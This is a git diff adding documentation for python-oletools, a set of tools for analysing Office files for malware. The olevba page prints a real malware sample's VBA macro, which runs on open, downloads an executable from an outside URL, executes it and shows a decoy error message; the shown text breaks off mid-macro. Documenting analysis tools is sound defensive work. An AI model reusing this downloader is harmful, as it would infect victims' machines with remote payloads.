diff --git a/oletools/doc/Contribute.html b/oletools/doc/Contribute.html
new file mode 100644
index 0000000..fc97258
--- /dev/null
+++ b/oletools/doc/Contribute.html
@@ -0,0 +1,34 @@
+
+
+
+
+
+
+
+
+
+How to Suggest Improvements, Report Issues or Contribute
+This is a personal open-source project, developed on my spare time. Any contribution, suggestion, feedback or bug report is welcome.
+To suggest improvements, report a bug or any issue, please use the issue reporting page, providing all the information and files to reproduce the problem.
+You may also contact the author directly to provide feedback.
+The code is available in a Mercurial repository on Bitbucket. You may use it to submit enhancements using forks and pull requests.
+
+
+
+
+
diff --git a/oletools/doc/Contribute.md b/oletools/doc/Contribute.md
new file mode 100644
index 0000000..770784e
--- /dev/null
+++ b/oletools/doc/Contribute.md
@@ -0,0 +1,28 @@
+How to Suggest Improvements, Report Issues or Contribute
+========================================================
+
+This is a personal open-source project, developed on my spare time. Any contribution, suggestion, feedback or bug report is welcome.
+
+To **suggest improvements, report a bug or any issue**, please use the [issue reporting page](https://bitbucket.org/decalage/olefileio_pl/issues?status=new&status=open), providing all the information and files to reproduce the problem.
+
+You may also [contact the author](http://decalage.info/contact) directly to **provide feedback**.
+
+The code is available in [a Mercurial repository on Bitbucket](https://bitbucket.org/decalage/oletools). You may use it to **submit enhancements** using forks and pull requests.
+
+--------------------------------------------------------------------------
+
+python-oletools documentation
+-----------------------------
+
+- [[Home]]
+- [[License]]
+- [[Install]]
+- [[Contribute]], Suggest Improvements or Report Issues
+- Tools:
+ - [[olebrowse]]
+ - [[oleid]]
+ - [[olemeta]]
+ - [[oletimes]]
+ - [[olevba]]
+ - [[pyxswf]]
+ - [[rtfobj]]
\ No newline at end of file
diff --git a/oletools/doc/Home.html b/oletools/doc/Home.html
new file mode 100644
index 0000000..1d3ca7d
--- /dev/null
+++ b/oletools/doc/Home.html
@@ -0,0 +1,45 @@
+
+
+
+
+
+
+
+
+
+
+This is the home page of the documentation for python-oletools. The latest version can be found online, otherwise a copy is provided in the doc subfolder of the package.
+python-oletools is a package of python tools to analyze Microsoft OLE2 files (also called Structured Storage, Compound File Binary Format or Compound Document File Format), such as Microsoft Office documents or Outlook messages, mainly for malware analysis and debugging. It is based on the OleFileIO_PL parser. See http://www.decalage.info/python/oletools for more info.
+Quick links: Home page - Download - Documentation - Report Issues/Suggestions/Questions - Contact the author - Repository - Updates on Twitter
+Note: python-oletools is not related to OLETools published by BeCubed Software.
+
+
+- olebrowse: A simple GUI to browse OLE files (e.g. MS Word, Excel, Powerpoint documents), to view and extract individual data streams.
+- oleid: a tool to analyze OLE files to detect specific characteristics usually found in malicious files.
+- olemeta: a tool to extract all standard properties (metadata) from OLE files.
+- oletimes: a tool to extract creation and modification timestamps of all streams and storages.
+- olevba: a tool to extract VBA Macro source code from MS Office documents (OLE and OpenXML).
+- pyxswf: a tool to detect, extract and analyze Flash objects (SWF) that may be embedded in files such as MS Office documents (e.g. Word, Excel) and RTF, which is especially useful for malware analysis.
+- rtfobj: a tool and python module to extract embedded objects from RTF files.
+- and a few others (coming soon)
+
+
+
+
+
+
diff --git a/oletools/doc/Home.md b/oletools/doc/Home.md
new file mode 100644
index 0000000..21479e8
--- /dev/null
+++ b/oletools/doc/Home.md
@@ -0,0 +1,43 @@
+python-oletools v0.06 documentation
+===================================
+
+This is the home page of the documentation for python-oletools. The latest version can be found [online](https://bitbucket.org/decalage/oletools/wiki), otherwise a copy is provided in the doc subfolder of the package.
+
+[python-oletools](http://www.decalage.info/python/oletools) is a package of python tools to analyze [Microsoft OLE2 files (also called Structured Storage, Compound File Binary Format or Compound Document File Format)](http://en.wikipedia.org/wiki/Compound_File_Binary_Format), such as Microsoft Office documents or Outlook messages, mainly for malware analysis and debugging. It is based on the [OleFileIO_PL](http://www.decalage.info/python/olefileio) parser. See [http://www.decalage.info/python/oletools](http://www.decalage.info/python/oletools) for more info.
+
+**Quick links:** [Home page](http://www.decalage.info/python/oletools) - [Download](https://bitbucket.org/decalage/oletools/downloads) - [Documentation](https://bitbucket.org/decalage/oletools/wiki) - [Report Issues/Suggestions/Questions](https://bitbucket.org/decalage/oletools/issues?status=new&status=open) - [Contact the author](http://decalage.info/contact) - [Repository](https://bitbucket.org/decalage/oletools) - [Updates on Twitter](https://twitter.com/decalage2)
+
+Note: python-oletools is not related to OLETools published by BeCubed Software.
+
+Tools in python-oletools:
+-------------------------
+
+- **[[olebrowse]]**: A simple GUI to browse OLE files (e.g. MS Word, Excel, Powerpoint documents), to
+ view and extract individual data streams.
+- **[[oleid]]**: a tool to analyze OLE files to detect specific characteristics usually found in malicious files.
+- **[[olemeta]]**: a tool to extract all standard properties (metadata) from OLE files.
+- **[[oletimes]]**: a tool to extract creation and modification timestamps of all streams and storages.
+- **[[olevba]]**: a tool to extract VBA Macro source code from MS Office documents (OLE and OpenXML).
+- **[[pyxswf]]**: a tool to detect, extract and analyze Flash objects (SWF) that may
+ be embedded in files such as MS Office documents (e.g. Word, Excel) and RTF,
+ which is especially useful for malware analysis.
+- **[[rtfobj]]**: a tool and python module to extract embedded objects from RTF files.
+- and a few others (coming soon)
+
+--------------------------------------------------------------------------
+
+python-oletools documentation
+-----------------------------
+
+- [[Home]]
+- [[License]]
+- [[Install]]
+- [[Contribute]], Suggest Improvements or Report Issues
+- Tools:
+ - [[olebrowse]]
+ - [[oleid]]
+ - [[olemeta]]
+ - [[oletimes]]
+ - [[olevba]]
+ - [[pyxswf]]
+ - [[rtfobj]]
\ No newline at end of file
diff --git a/oletools/doc/Install.html b/oletools/doc/Install.html
new file mode 100644
index 0000000..59a061e
--- /dev/null
+++ b/oletools/doc/Install.html
@@ -0,0 +1,38 @@
+
+
+
+
+
+
+
+
+
+
+Pre-requisites
+For now, python-oletools require Python 2.x. They are not compatible with Python 3.x yet.
+
+To use python-oletools from the command line as analysis tools, you may simply download the zip archive and extract the files in the directory of your choice.
+You may then add the directory to your PATH environment variable to access the tools from anywhere.
+For python applications
+If you plan to use python-oletools with other Python applications or your own scripts, the simplest solution is to use "pip install oletools" or "easy_install oletools" to download and install the package in one go.
+Otherwise you may download/extract the zip archive in a temporary directory and run "python setup.py install".
+
+
+
+
+
diff --git a/oletools/doc/Install.md b/oletools/doc/Install.md
new file mode 100644
index 0000000..8cc90e8
--- /dev/null
+++ b/oletools/doc/Install.md
@@ -0,0 +1,40 @@
+How to Download and Install python-oletools
+===========================================
+
+Pre-requisites
+--------------
+
+For now, python-oletools require Python 2.x. They are not compatible with Python 3.x yet.
+
+
+For command-line tools
+----------------------
+
+To use python-oletools from the command line as analysis tools, you may simply [download the zip archive](https://bitbucket.org/decalage/oletools/downloads) and extract the files in the directory of your choice.
+
+You may then add the directory to your PATH environment variable to access the tools from anywhere.
+
+For python applications
+----------------------
+
+If you plan to use python-oletools with other Python applications or your own scripts, the simplest solution is to use "**pip install oletools**" or "**easy_install oletools**" to download and install the package in one go.
+
+Otherwise you may download/extract the [zip archive](https://bitbucket.org/decalage/oletools/downloads) in a temporary directory and run "**python setup.py install**".
+
+--------------------------------------------------------------------------
+
+python-oletools documentation
+-----------------------------
+
+- [[Home]]
+- [[License]]
+- [[Install]]
+- [[Contribute]], Suggest Improvements or Report Issues
+- Tools:
+ - [[olebrowse]]
+ - [[oleid]]
+ - [[olemeta]]
+ - [[oletimes]]
+ - [[olevba]]
+ - [[pyxswf]]
+ - [[rtfobj]]
\ No newline at end of file
diff --git a/oletools/doc/License.html b/oletools/doc/License.html
new file mode 100644
index 0000000..b63fa15
--- /dev/null
+++ b/oletools/doc/License.html
@@ -0,0 +1,51 @@
+
+
+
+
+
+
+
+
+
+
+This license applies to the python-oletools package, apart from the thirdparty folder which contains third-party files published with their own license.
+The python-oletools package is copyright (c) 2012-2014 Philippe Lagadec (http://www.decalage.info)
+All rights reserved.
+Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+
+- Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+- Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+
+
+| License for officeparser |
+
+
+
+olevba contains modified source code from the officeparser project, published under the following MIT License (MIT):
+officeparser is copyright (c) 2014 John William Davison
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
+The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
+
+
+
+
diff --git a/oletools/doc/License.md b/oletools/doc/License.md
new file mode 100644
index 0000000..c58cf46
--- /dev/null
+++ b/oletools/doc/License.md
@@ -0,0 +1,74 @@
+License for python-oletools
+===========================
+
+This license applies to the [python-oletools](http://www.decalage.info/python/oletools) package, apart from the thirdparty folder which contains third-party files published with their own license.
+
+The python-oletools package is copyright (c) 2012-2014 Philippe Lagadec ([http://www.decalage.info](http://www.decalage.info))
+
+All rights reserved.
+
+Redistribution and use in source and binary forms, with or without modification,
+are permitted provided that the following conditions are met:
+
+ * Redistributions of source code must retain the above copyright notice, this
+ list of conditions and the following disclaimer.
+ * Redistributions in binary form must reproduce the above copyright notice,
+ this list of conditions and the following disclaimer in the documentation
+ and/or other materials provided with the distribution.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
+ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
+WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
+FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
+CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+
+----------
+License for officeparser
+------------------------
+
+olevba contains modified source code from the [officeparser](https://github.com/unixfreak0037/officeparser) project, published
+under the following MIT License (MIT):
+
+officeparser is copyright (c) 2014 John William Davison
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.
+
+--------------------------------------------------------------------------
+
+python-oletools documentation
+-----------------------------
+
+- [[Home]]
+- [[License]]
+- [[Install]]
+- [[Contribute]], Suggest Improvements or Report Issues
+- Tools:
+ - [[olebrowse]]
+ - [[oleid]]
+ - [[olemeta]]
+ - [[oletimes]]
+ - [[olevba]]
+ - [[pyxswf]]
+ - [[rtfobj]]
\ No newline at end of file
diff --git a/oletools/doc/olebrowse.html b/oletools/doc/olebrowse.html
new file mode 100644
index 0000000..58d1eb1
--- /dev/null
+++ b/oletools/doc/olebrowse.html
@@ -0,0 +1,48 @@
+
+
+
+
+
+
+
+
+
+olebrowse
+olebrowse is a simple GUI to browse OLE files (e.g. MS Word, Excel, Powerpoint documents), to view and extract individual data streams.
+It is part of the python-oletools package.
+Usage
+olebrowse.py [file]
+If you provide a file it will be opened, else a dialog will allow you to browse folders to open a file. Then if it is a valid OLE file, the list of data streams will be displayed. You can select a stream, and then either view its content in a builtin hexadecimal viewer, or save it to a file for further analysis.
+Screenshots
+Main menu, showing all streams in the OLE file:
+
+Menu with actions for a stream:
+
+Hex view for a stream:
+
+
+
+
+
+
diff --git a/oletools/doc/olebrowse.md b/oletools/doc/olebrowse.md
new file mode 100644
index 0000000..454bffe
--- /dev/null
+++ b/oletools/doc/olebrowse.md
@@ -0,0 +1,47 @@
+olebrowse
+=========
+
+olebrowse is a simple GUI to browse OLE files (e.g. MS Word, Excel, Powerpoint documents), to
+view and extract individual data streams.
+
+It is part of the [python-oletools](http://www.decalage.info/python/oletools) package.
+
+Usage
+-----
+
+ olebrowse.py [file]
+
+If you provide a file it will be opened, else a dialog will allow you to browse folders to open a file. Then if it is a valid OLE file, the list of data streams will be displayed. You can select a stream, and then either view its content in a builtin hexadecimal viewer, or save it to a file for further analysis.
+
+Screenshots
+-----------
+
+Main menu, showing all streams in the OLE file:
+
+
+
+Menu with actions for a stream:
+
+
+
+Hex view for a stream:
+
+
+
+--------------------------------------------------------------------------
+
+python-oletools documentation
+-----------------------------
+
+- [[Home]]
+- [[License]]
+- [[Install]]
+- [[Contribute]], Suggest Improvements or Report Issues
+- Tools:
+ - [[olebrowse]]
+ - [[oleid]]
+ - [[olemeta]]
+ - [[oletimes]]
+ - [[olevba]]
+ - [[pyxswf]]
+ - [[rtfobj]]
\ No newline at end of file
diff --git a/oletools/doc/olebrowse1_menu.png b/oletools/doc/olebrowse1_menu.png
new file mode 100644
index 0000000..3c64f5e
--- /dev/null
+++ b/oletools/doc/olebrowse1_menu.png
diff --git a/oletools/doc/olebrowse2_stream.png b/oletools/doc/olebrowse2_stream.png
new file mode 100644
index 0000000..fbb7cd0
--- /dev/null
+++ b/oletools/doc/olebrowse2_stream.png
diff --git a/oletools/doc/olebrowse3_hexview.png b/oletools/doc/olebrowse3_hexview.png
new file mode 100644
index 0000000..785f6e6
--- /dev/null
+++ b/oletools/doc/olebrowse3_hexview.png
diff --git a/oletools/doc/oleid.html b/oletools/doc/oleid.html
new file mode 100644
index 0000000..8bd7057
--- /dev/null
+++ b/oletools/doc/oleid.html
@@ -0,0 +1,74 @@
+
+
+
+
+
+
+
+
+
+oleid
+oleid is a script to analyze OLE files such as MS Office documents (e.g. Word, Excel), to detect specific characteristics usually found in malicious files (e.g. malware). For example it can detect VBA macros and embedded Flash objects.
+It is part of the python-oletools package.
+Main Features
+
+- Detect OLE file type from its internal structure (e.g. MS Word, Excel, PowerPoint, ...)
+- Detect VBA Macros
+- Detect embedded Flash objects
+- Detect embedded OLE objects
+- Detect MS Office encryption
+- Can be used as a command-line tool
+- Python API to integrate it in your applications
+
+Planned improvements:
+
+- Extract the most important metadata fields
+- Support for OpenXML files and embedded OLE files
+- Generic VBA macros detection
+- Detect auto-executable VBA macros
+- Extended OLE file types detection
+- Detect unusual OLE structures (fragmentation, unused sectors, etc)
+- Options to scan multiple files
+- Options to scan files from encrypted zip archives
+- CSV output
+
+Usage
+oleid.py <file>
+Example
+Analyzing a Word document containing a Flash object and VBA macros:
+C:\oletools>oleid.py word_flash_vba.doc
+
+Filename: word_flash_vba.doc
+OLE format: True
+Has SummaryInformation stream: True
+Application name: Microsoft Office Word
+Encrypted: False
+Word Document: True
+VBA Macros: True
+Excel Workbook: False
+PowerPoint Presentation: False
+Visio Drawing: False
+ObjectPool: True
+Flash objects: 1
+How to use oleid in Python applications
+TODO
+
+
+
+
+
diff --git a/oletools/doc/oleid.md b/oletools/doc/oleid.md
new file mode 100644
index 0000000..fa12911
--- /dev/null
+++ b/oletools/doc/oleid.md
@@ -0,0 +1,77 @@
+oleid
+=====
+
+oleid is a script to analyze OLE files such as MS Office documents (e.g. Word,
+Excel), to detect specific characteristics usually found in malicious files (e.g. malware).
+For example it can detect VBA macros and embedded Flash objects.
+
+It is part of the [python-oletools](http://www.decalage.info/python/oletools) package.
+
+## Main Features
+
+- Detect OLE file type from its internal structure (e.g. MS Word, Excel, PowerPoint, ...)
+- Detect VBA Macros
+- Detect embedded Flash objects
+- Detect embedded OLE objects
+- Detect MS Office encryption
+- Can be used as a command-line tool
+- Python API to integrate it in your applications
+
+Planned improvements:
+
+- Extract the most important metadata fields
+- Support for OpenXML files and embedded OLE files
+- Generic VBA macros detection
+- Detect auto-executable VBA macros
+- Extended OLE file types detection
+- Detect unusual OLE structures (fragmentation, unused sectors, etc)
+- Options to scan multiple files
+- Options to scan files from encrypted zip archives
+- CSV output
+
+## Usage
+
+ :::text
+ oleid.py
+
+### Example
+
+Analyzing a Word document containing a Flash object and VBA macros:
+
+ :::text
+ C:\oletools>oleid.py word_flash_vba.doc
+
+ Filename: word_flash_vba.doc
+ OLE format: True
+ Has SummaryInformation stream: True
+ Application name: Microsoft Office Word
+ Encrypted: False
+ Word Document: True
+ VBA Macros: True
+ Excel Workbook: False
+ PowerPoint Presentation: False
+ Visio Drawing: False
+ ObjectPool: True
+ Flash objects: 1
+
+## How to use oleid in Python applications
+
+TODO
+
+--------------------------------------------------------------------------
+
+python-oletools documentation
+-----------------------------
+
+- [[Home]]
+- [[License]]
+- [[Install]]
+- [[Contribute]], Suggest Improvements or Report Issues
+- Tools:
+ - [[olebrowse]]
+ - [[oleid]]
+ - [[olemeta]]
+ - [[oletimes]]
+ - [[olevba]]
+ - [[pyxswf]]
+ - [[rtfobj]]
\ No newline at end of file
diff --git a/oletools/doc/olemeta.html b/oletools/doc/olemeta.html
new file mode 100644
index 0000000..c0254c1
--- /dev/null
+++ b/oletools/doc/olemeta.html
@@ -0,0 +1,90 @@
+
+
+
+
+
+
+
+
+
+
+olemeta is a script to parse OLE files such as MS Office documents (e.g. Word, Excel), to extract all standard properties present in the OLE file.
+It is part of the python-oletools package.
+Usage
+olemeta.py <file>
+Example
+Checking the malware sample DIAN_caso-5415.doc:
+>olemeta.py DIAN_caso-5415.doc
+
+Properties from SummaryInformation stream:
+- codepage: 1252
+- title: 'Gu\xeda MIPYME para ser emisor electr\xf3nico'
+- subject: ''
+- author: 'OFEyDV'
+- keywords: ''
+- comments: ''
+- template: 'Normal.dotm'
+- last_saved_by: 'clein'
+- revision_number: '13'
+- total_edit_time: 4800L
+- last_printed: datetime.datetime(2006, 6, 7, 14, 4)
+- create_time: datetime.datetime(2009, 3, 30, 14, 18)
+- last_saved_time: datetime.datetime(2014, 5, 14, 12, 45)
+- num_pages: 7
+- num_words: 269
+- num_chars: 1485
+- thumbnail: None
+- creating_application: 'Microsoft Office Word'
+- security: 0
+
+Properties from DocumentSummaryInformation stream:
+- codepage_doc: 1252
+- category: None
+- presentation_target: None
+- bytes: None
+- lines: 12
+- paragraphs: 3
+- slides: None
+- notes: None
+- hidden_slides: None
+- mm_clips: None
+- scale_crop: False
+- heading_pairs: None
+- titles_of_parts: None
+- manager: None
+- company: 'Servicio de Impuestos Internos'
+- links_dirty: False
+- chars_with_spaces: 1751
+- unused: None
+- shared_doc: False
+- link_base: None
+- hlinks: None
+- hlinks_changed: False
+- version: 786432
+- dig_sig: None
+- content_type: None
+- content_status: None
+- language: None
+- doc_version: None
+
+TODO
+
+
+
+
+
diff --git a/oletools/doc/olemeta.md b/oletools/doc/olemeta.md
new file mode 100644
index 0000000..3e67505
--- /dev/null
+++ b/oletools/doc/olemeta.md
@@ -0,0 +1,92 @@
+olemeta
+=======
+
+olemeta is a script to parse OLE files such as MS Office documents (e.g. Word,
+Excel), to extract all standard properties present in the OLE file.
+
+It is part of the [python-oletools](http://www.decalage.info/python/oletools) package.
+
+## Usage
+
+ :::text
+ olemeta.py
+
+### Example
+
+Checking the malware sample [DIAN_caso-5415.doc](https://malwr.com/analysis/M2I4YWRhM2IwY2QwNDljN2E3ZWFjYTg3ODk4NmZhYmE/):
+
+ :::text
+ >olemeta.py DIAN_caso-5415.doc
+
+ Properties from SummaryInformation stream:
+ - codepage: 1252
+ - title: 'Gu\xeda MIPYME para ser emisor electr\xf3nico'
+ - subject: ''
+ - author: 'OFEyDV'
+ - keywords: ''
+ - comments: ''
+ - template: 'Normal.dotm'
+ - last_saved_by: 'clein'
+ - revision_number: '13'
+ - total_edit_time: 4800L
+ - last_printed: datetime.datetime(2006, 6, 7, 14, 4)
+ - create_time: datetime.datetime(2009, 3, 30, 14, 18)
+ - last_saved_time: datetime.datetime(2014, 5, 14, 12, 45)
+ - num_pages: 7
+ - num_words: 269
+ - num_chars: 1485
+ - thumbnail: None
+ - creating_application: 'Microsoft Office Word'
+ - security: 0
+
+ Properties from DocumentSummaryInformation stream:
+ - codepage_doc: 1252
+ - category: None
+ - presentation_target: None
+ - bytes: None
+ - lines: 12
+ - paragraphs: 3
+ - slides: None
+ - notes: None
+ - hidden_slides: None
+ - mm_clips: None
+ - scale_crop: False
+ - heading_pairs: None
+ - titles_of_parts: None
+ - manager: None
+ - company: 'Servicio de Impuestos Internos'
+ - links_dirty: False
+ - chars_with_spaces: 1751
+ - unused: None
+ - shared_doc: False
+ - link_base: None
+ - hlinks: None
+ - hlinks_changed: False
+ - version: 786432
+ - dig_sig: None
+ - content_type: None
+ - content_status: None
+ - language: None
+ - doc_version: None
+
+## How to use olemeta in Python applications
+
+TODO
+
+--------------------------------------------------------------------------
+
+python-oletools documentation
+-----------------------------
+
+- [[Home]]
+- [[License]]
+- [[Install]]
+- [[Contribute]], Suggest Improvements or Report Issues
+- Tools:
+ - [[olebrowse]]
+ - [[oleid]]
+ - [[olemeta]]
+ - [[oletimes]]
+ - [[olevba]]
+ - [[pyxswf]]
+ - [[rtfobj]]
\ No newline at end of file
diff --git a/oletools/doc/oletimes.html b/oletools/doc/oletimes.html
new file mode 100644
index 0000000..f5f4d0c
--- /dev/null
+++ b/oletools/doc/oletimes.html
@@ -0,0 +1,58 @@
+
+
+
+
+
+
+
+
+
+oletimes
+oletimes is a script to parse OLE files such as MS Office documents (e.g. Word, Excel), to extract creation and modification times of all streams and storages in the OLE file.
+It is part of the python-oletools package.
+Usage
+oletimes.py <file>
+Example
+Checking the malware sample DIAN_caso-5415.doc:
+>oletimes.py DIAN_caso-5415.doc
+
+- Root mtime=2014-05-14 12:45:24.752000 ctime=None
+- '\x01CompObj': mtime=None ctime=None
+- '\x05DocumentSummaryInformation': mtime=None ctime=None
+- '\x05SummaryInformation': mtime=None ctime=None
+- '1Table': mtime=None ctime=None
+- 'Data': mtime=None ctime=None
+- 'Macros': mtime=2014-05-14 12:45:24.708000 ctime=2014-05-14 12:45:24.355000
+- 'Macros/PROJECT': mtime=None ctime=None
+- 'Macros/PROJECTwm': mtime=None ctime=None
+- 'Macros/VBA': mtime=2014-05-14 12:45:24.684000 ctime=2014-05-14 12:45:24.355000
+- 'Macros/VBA/ThisDocument': mtime=None ctime=None
+- 'Macros/VBA/_VBA_PROJECT': mtime=None ctime=None
+- 'Macros/VBA/__SRP_0': mtime=None ctime=None
+- 'Macros/VBA/__SRP_1': mtime=None ctime=None
+- 'Macros/VBA/__SRP_2': mtime=None ctime=None
+- 'Macros/VBA/__SRP_3': mtime=None ctime=None
+- 'Macros/VBA/dir': mtime=None ctime=None
+- 'WordDocument': mtime=None ctime=None
+How to use oletimes in Python applications
+TODO
+
+
+
+
+
diff --git a/oletools/doc/oletimes.md b/oletools/doc/oletimes.md
new file mode 100644
index 0000000..3d24c7f
--- /dev/null
+++ b/oletools/doc/oletimes.md
@@ -0,0 +1,61 @@
+oletimes
+========
+
+oletimes is a script to parse OLE files such as MS Office documents (e.g. Word,
+Excel), to extract creation and modification times of all streams and storages
+in the OLE file.
+
+It is part of the [python-oletools](http://www.decalage.info/python/oletools) package.
+
+## Usage
+
+ :::text
+ oletimes.py
+
+### Example
+
+Checking the malware sample [DIAN_caso-5415.doc](https://malwr.com/analysis/M2I4YWRhM2IwY2QwNDljN2E3ZWFjYTg3ODk4NmZhYmE/):
+
+ :::text
+ >oletimes.py DIAN_caso-5415.doc
+
+ - Root mtime=2014-05-14 12:45:24.752000 ctime=None
+ - '\x01CompObj': mtime=None ctime=None
+ - '\x05DocumentSummaryInformation': mtime=None ctime=None
+ - '\x05SummaryInformation': mtime=None ctime=None
+ - '1Table': mtime=None ctime=None
+ - 'Data': mtime=None ctime=None
+ - 'Macros': mtime=2014-05-14 12:45:24.708000 ctime=2014-05-14 12:45:24.355000
+ - 'Macros/PROJECT': mtime=None ctime=None
+ - 'Macros/PROJECTwm': mtime=None ctime=None
+ - 'Macros/VBA': mtime=2014-05-14 12:45:24.684000 ctime=2014-05-14 12:45:24.355000
+ - 'Macros/VBA/ThisDocument': mtime=None ctime=None
+ - 'Macros/VBA/_VBA_PROJECT': mtime=None ctime=None
+ - 'Macros/VBA/__SRP_0': mtime=None ctime=None
+ - 'Macros/VBA/__SRP_1': mtime=None ctime=None
+ - 'Macros/VBA/__SRP_2': mtime=None ctime=None
+ - 'Macros/VBA/__SRP_3': mtime=None ctime=None
+ - 'Macros/VBA/dir': mtime=None ctime=None
+ - 'WordDocument': mtime=None ctime=None
+
+## How to use oletimes in Python applications
+
+TODO
+
+--------------------------------------------------------------------------
+
+python-oletools documentation
+-----------------------------
+
+- [[Home]]
+- [[License]]
+- [[Install]]
+- [[Contribute]], Suggest Improvements or Report Issues
+- Tools:
+ - [[olebrowse]]
+ - [[oleid]]
+ - [[olemeta]]
+ - [[oletimes]]
+ - [[olevba]]
+ - [[pyxswf]]
+ - [[rtfobj]]
\ No newline at end of file
diff --git a/oletools/doc/olevba.html b/oletools/doc/olevba.html
new file mode 100644
index 0000000..689e882
--- /dev/null
+++ b/oletools/doc/olevba.html
@@ -0,0 +1,87 @@
+
+
+
+
+
+
+
+
+
+olevba
+olevba is a script to parse OLE and OpenXML files such as MS Office documents (e.g. Word, Excel), to extract VBA Macro code in clear text.
+It is part of the python-oletools package.
+Supported formats:
+
+- Word 97-2003 (.doc, .dot), Word 2007+ (.docm, .dotm)
+- Excel 97-2003 (.xls), Excel 2007+ (.xlsm, .xlsb)
+- PowerPoint 2007+ (.pptm, .ppsm)
+
+olevba is based on source code from officeparser by John William Davison
+Usage
+olevba.py <file>
+Example
+Checking the malware sample DIAN_caso-5415.doc:
+>olevba.py DIAN_caso-5415.doc
+
+INFO: Extracting VBA Macros from OLE file DIAN_caso-5415.doc
+
+-------------------------------------------------------------------------------
+ThisDocument.cls
+
+Attribute VB_Name = "ThisDocument"
+Attribute VB_Base = "1Normal.ThisDocument"
+Attribute VB_GlobalNameSpace = False
+Attribute VB_Creatable = False
+Attribute VB_PredeclaredId = True
+Attribute VB_Exposed = True
+Attribute VB_TemplateDerived = True
+Attribute VB_Customizable = True
+Option Explicit
+Private Declare Function URLDownloadToFileA Lib "urlmon" (ByVal FVQGKS As Long, _
+ByVal WSGSGY As String, ByVal IFRRFV As String, ByVal NCVOLV As Long, _
+ByVal HQTLDG As Long) As Long
+Sub AutoOpen()
+ Auto_Open
+End Sub
+Sub Auto_Open()
+SNVJYQ
+End Sub
+Public Sub SNVJYQ()
+ OGEXYR "http://germanya.com.ec/logs/test.exe", Environ("TMP") & "\sfjozjero.exe"
+End Sub
+Function OGEXYR(XSTAHU As String, PHHWIV As String) As Boolean
+ Dim HRKUYU, lala As Long
+ HRKUYU = URLDownloadToFileA(0, XSTAHU, PHHWIV, 0, 0)
+ If HRKUYU = 0 Then OGEXYR = True
+ Dim YKPZZS
+ YKPZZS = Shell(PHHWIV, 1)
+ MsgBox "El contenido de este documento no es compatible con este equipo." & vbCrLf & vbCrLf & "Por favor intente desde otro equipo.", vbCritical, "Equipo no compatible"
